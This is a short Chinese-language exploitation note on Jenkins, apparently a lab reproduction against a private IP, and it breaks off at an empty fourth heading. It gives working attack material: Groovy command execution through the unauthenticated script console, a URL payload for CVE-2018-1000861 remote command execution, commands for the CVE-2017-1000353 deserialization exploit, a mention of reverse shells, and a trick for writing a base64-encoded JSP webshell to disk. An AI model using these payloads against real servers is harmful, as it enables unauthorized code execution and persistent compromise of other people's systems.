一、未授权访问
访问url:
http://172.16.20.134:8080/script
命令执行
println "ls -al".execute().text
也可以利用powershell 或者python脚本反弹shell
二、CVE-2018-1000861 远程命令执行漏洞
payload:
securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){ "touch /tmp/success".execute() }}
&value=转成url编码
发送get请求:
python脚本:
https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py
三、CVE-2017-1000353 远程代码执行
工具地址:
# 生成serjava -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar 1.ser "touch /tmp/1.jsp"# 发送serpython exploit.py http://172.16.20.134:8080 1.ser
exploit.py这里要注释下,如果你使用代理的话可以添加,这里只是复现,用不到
另外一个linux写shell的小技巧:
echo base64后的木马内容 |base64 -d > 1.jsp
jsp生成成功
四、